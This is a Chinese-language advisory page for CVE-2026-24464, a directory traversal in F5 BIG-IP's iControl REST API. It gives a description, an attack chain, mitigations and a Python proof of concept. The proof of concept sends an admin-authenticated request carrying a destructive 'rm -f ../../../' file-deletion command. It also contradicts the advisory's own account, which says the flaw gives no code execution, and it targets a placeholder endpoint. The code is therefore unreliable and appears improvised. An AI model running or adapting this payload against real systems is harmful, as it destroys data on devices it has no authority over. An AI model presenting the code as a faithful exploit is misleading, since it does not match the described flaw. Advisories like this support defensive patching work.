CVE-2026-24464 CVSS 6.8 中危

CVE-2026-24464 F5 BIG-IP目录遍历漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24464

漏洞类型

目录遍历

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2026-24464 是 F5 BIG-IP 设备在 Appliance 模式下运行时存在的一个安全漏洞。该漏洞源于某个未公开的 iControl REST 端点未能正确验证用户输入路径，导致目录遍历缺陷。已获得身份验证且具有管理员角色权限的攻击者可利用此漏洞跨越安全边界，删除系统上的关键文件。此漏洞攻击复杂度低，无需用户交互，但要求攻击者拥有高权限账户。尽管机密性影响有限，但由于可能导致关键数据丢失，完整性影响较高。请注意，已达到技术支持终止（EoTS）的软件版本不在评估范围内。

技术细节

该漏洞的技术原理在于 F5 BIG-IP 的 iControl REST 接口在处理文件操作请求时，缺乏对路径遍历字符（如 '../'）的充分过滤。当设备处于 Appliance 模式时，特定的 REST 端点暴露了文件管理功能。攻击者首先需要通过网络访问目标设备，并使用拥有管理员权限的凭证进行身份认证，获取有效的 API 令牌。随后，攻击者向受影响的端点发送精心构造的 HTTP POST 或 DELETE 请求，在路径参数中注入目录遍历序列。由于服务端未对路径进行标准化处理或安全边界检查，攻击者能够将文件操作导向预期的根目录之外，从而删除非授权目录下的文件。这种利用方式虽然不能直接执行代码，但可通过删除系统配置或组件文件破坏系统完整性。

攻击链分析

STEP 1

侦察

攻击者识别目标为运行 Appliance 模式的 F5 BIG-IP 设备，并确定 iControl REST 服务端口开放。

STEP 2

获取凭证

攻击者通过钓鱼或其他手段获取具有管理员角色的高权限账户凭证。

STEP 3

利用漏洞

攻击者使用管理员凭证登录 iControl REST API，向未公开的漏洞端点发送包含目录遍历序列（../）的恶意请求。

STEP 4

达成影响

服务器端处理请求，未能拦截遍历攻击，导致攻击者跨越安全边界并成功删除目标系统文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-24464: Directory Traversal in F5 BIG-IP iControl REST
# This script demonstrates the potential exploitation logic.
# Note: The specific vulnerable endpoint is undisclosed in the summary.

TARGET_URL = "https://<target_ip>/mgmt/tm/util/<vulnerable_endpoint>"
AUTH_TOKEN = "<admin_auth_token>"

headers = {
    "X-F5-Auth-Token": AUTH_TOKEN,
    "Content-Type": "application/json"
}

# Payload utilizing directory traversal to delete a file
payload = {
    "command": "run",
    "utilCmdArgs": "rm -f ../../../var/tmp/sensitive_config.xml"
}

try:
    response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False)
    if response.status_code == 200:
        print("[+] Potential file deletion successful.")
    else:
        print(f"[-] Request failed. Status: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

F5 BIG-IP (Appliance Mode, 具体版本需参考厂商公告 K000160911)

防御指南

临时缓解措施

在无法立即升级补丁的情况下，建议管理员通过网络访问控制列表（ACL）限制对 iControl REST 接口的访问，仅允许来自受信任管理网络的连接。同时，应加强对管理员账户的监控，防止凭证泄露导致漏洞被利用。务必确认设备未运行在已结束技术支持（EoTS）的软件版本上。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-24464
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-24464
3 Details https://www.cvedetails.com/cve/CVE-2026-24464/
4 VulDB https://vuldb.com/cve/CVE-2026-24464
5 Link https://my.f5.com/manage/s/article/K000160911

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表